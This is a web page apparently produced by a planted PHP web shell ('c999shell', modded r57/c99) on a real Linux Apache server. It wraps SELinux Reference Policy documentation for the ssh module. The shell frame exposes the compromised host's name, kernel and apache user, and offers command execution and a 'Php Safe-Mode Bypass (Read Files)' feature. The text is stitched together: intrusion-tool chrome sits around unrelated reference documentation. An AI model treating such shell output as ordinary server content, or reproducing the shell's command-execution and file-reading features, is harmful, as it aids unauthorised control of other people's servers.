Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/selinux-policy-2.4.6/html/ drwxr-xr-x |
Viewing file: services_ssh.html (22.33 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | Security Enhanced Linux Reference Policy
+
admin
-
afs
+
system
- aide - aisexec - amavis - apache - apm - arpwatch - asterisk - audioentropy - automount - avahi - bind - bluetooth - canna - ccs - cipe - clamav - clockspeed - clogd - comsat - courier - cpucontrol - cron - cups - cvs - cyrus - dante - dbskk - dbus - dcc - ddclient - dhcp - dictd - distcc - djbdns - dnsmasq - dovecot - exim - fail2ban - fetchmail - finger - ftp - gatekeeper - gpm - hal - howl - i18n_input - imaze - inetd - inn - ircd - irqbalance - jabber - kerberos - ktalk - ldap - lpd - mailman - milter - monop - mta - munin - mysql - nagios - nessus - networkmanager - nis - nscd - nsd - ntop - ntp - nx - oav - oddjob - openca - openct - openvpn - pcscd - pegasus - perdition - pki - portmap - portslave - postfix - postgresql - postgrey - ppp - prelude - privoxy - procmail - publicfile - pxe - pyzor - qmail - radius - radvd - razor - rdisc - remotelogin - resmgr - rgmanager - rhcs - rhgb - ricci - rlogin - roundup - rpc - rshd - rsync - samba - sasl - sendmail - setroubleshoot - slrnpull - smartmon - snmp - snort - soundserver - spamassassin - speedtouch - squid - ssh - stunnel - sysstat - tcpd - telnet - tftp - timidity - tor - transproxy - ucspitcp - uptime - uucp - uwimap - vhostmd - virt - watchdog - xfs - xprint - xserver - zebra - zosremote * Global Booleans * Global Tunables * Layer Index * Interface Index * Template Index Layer: servicesModule: sshInterfaces TemplatesDescription:Secure shell client and server policy. Interfaces:
ssh_domtrans(
domain
)
SummaryExecute the ssh daemon sshd domain. Parameters
ssh_domtrans_keygen(
domain
)
SummaryExecute the ssh key generator in the ssh keygen domain. Parameters
ssh_dontaudit_read_server_keys(
domain
)
SummaryRead ssh server keys Parameters
ssh_dontaudit_rw_tcp_sockets(
domain
)
SummaryDo not audit attempts to read and write ssh server TCP sockets. Parameters
ssh_dontaudit_use_user_ssh_agent_fds(
domain
)
Summarydontaudit use of file descriptor from the ssh-agent. Parameters
ssh_exec(
domain
)
SummaryExecute the ssh client in the caller domain. Parameters
ssh_read_pipes(
domain
)
SummaryRead a ssh server unnamed pipe. Parameters
ssh_rw_stream_sockets(
domain
)
SummaryRead and write ssh server unix domain stream sockets. Parameters
ssh_rw_tcp_sockets(
domain
)
SummaryRead and write ssh server TCP sockets. Parameters
ssh_setattr_server_keys(
domain
)
SummaryRead ssh server keys Parameters
ssh_sigchld(
domain
)
SummarySend a SIGCHLD signal to the ssh server. Parameters
ssh_tcp_connect(
domain
)
SummaryConnect to SSH daemons over TCP sockets. (Deprecated) Parameters
ssh_use_user_ssh_agent_fds(
domain
)
SummaryInherit and use a file descriptor from the ssh-agent. Parameters
Templates:
ssh_basic_client_template(
userdomain_prefix
,
user_domain
,
user_role
)
SummaryBasic SSH client template. Description
This template creates a derived domains which are used for ssh client sessions. A derived type is also created to protect the user ssh keys.
This template was added for NX.
Parameters
ssh_per_role_template(
userdomain_prefix
,
user_domain
,
user_role
)
SummaryThe per role template for the ssh module. Description
This template creates a derived domains which are used for ssh client sessions and user ssh agents. A derived type is also created to protect the user ssh keys.
This template is invoked automatically for each user, and generally does not need to be invoked directly by policy writers.
Parameters
ssh_server_template(
userdomain_prefix
)
SummaryThe template to define a ssh server. Description
This template creates a domains to be used for creating a ssh server. This is typically done to have multiple ssh servers of different sensitivities, such as for an internal network-facing ssh server, and a external network-facing ssh server.
Parameters
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0196 ]-- |